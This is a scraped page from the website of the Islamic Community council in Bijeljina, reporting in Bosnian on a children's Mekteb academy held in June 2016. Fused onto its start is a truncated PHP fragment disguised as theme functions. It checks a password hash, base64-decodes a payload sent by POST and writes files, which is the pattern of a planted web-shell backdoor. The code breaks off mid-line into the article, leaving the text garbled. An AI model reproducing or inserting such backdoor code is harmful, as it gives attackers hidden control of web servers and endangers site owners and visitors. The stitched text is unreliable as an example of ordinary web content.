function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Prva Mektebska akademija MIZ Bijeljina - Medžlis Islamske zajednice Bijeljina

Prva Mektebska akademija MIZ Bijeljina

Prva Mektebska akademija MIZ Bijeljina

Povodom završetka mektebske nastave u mektebskoj 2015/2016, godini, u Omladinskom domu u džematu Atmačići, u subotu 4. juna 2016. godine u 11:30 sati, u potpuno ispunjenoj sali održana je, hvala Allahu, Prva Mektebska akademija Medžlisa Islamske zajednice Bijeljina.

Na početku programa prigodno Ašere proučio je Malik Okanović, koji je zaslužio treće mjesto iz Kiraeta, mlađi uzrast, na mektebskom takmičenju na nivou Muftijstva tuzlanskog.

DSCN3118

Svečani program Akademije upriličio je Hor “Atik” i najmlađi recitatori i učači Kur'ana, a prisustvoval su svi imami, muallimi i muallima, djeca polaznici Mektebskog centra Bijeljina i džematskih mekteba te njihovi roditelji iz svih džemata MIZ Bijeljina. Polaznicima mektebske nastave njihovi imami i muallimi dodijelili su prigodne Pohvale, a uslijedilo je i zajedničko fotografiranje.

DSCN3142

Prisutnima su se obratili Nihad Redžić, profesor i član I.O., Emir Musli, profesor i predsjednik I.O. te Samir ef. Camić, glavni imam Medžlisa Islamske zajednice Bijeljina, koji je pohvalio zalaganje djece i rad svih imama, muallima i muallime te pozvao prisutne roditelje da utiču na svoje familije i komšije da pošalju svoju djecu u Mekteb koji je temelj stvaranja dobrih ljudi, vjernika i čuvanja naše vjere, naroda i domovine. Nakon Akademije, podne namaz je klanjan u Atmadža džamiji.

DSCN3145

U mektebima na području MIZ Bijeljina mektebsku nastavu pohađa preko 200 djece, ali neka od njih nisu mogla prisustvovati Mektebskoj akademiji zboga ekskurzija u njihovim matičnim školama ili zbog nekih drugih obaveza.

Pogledajte kako je bilo u Atmačićima…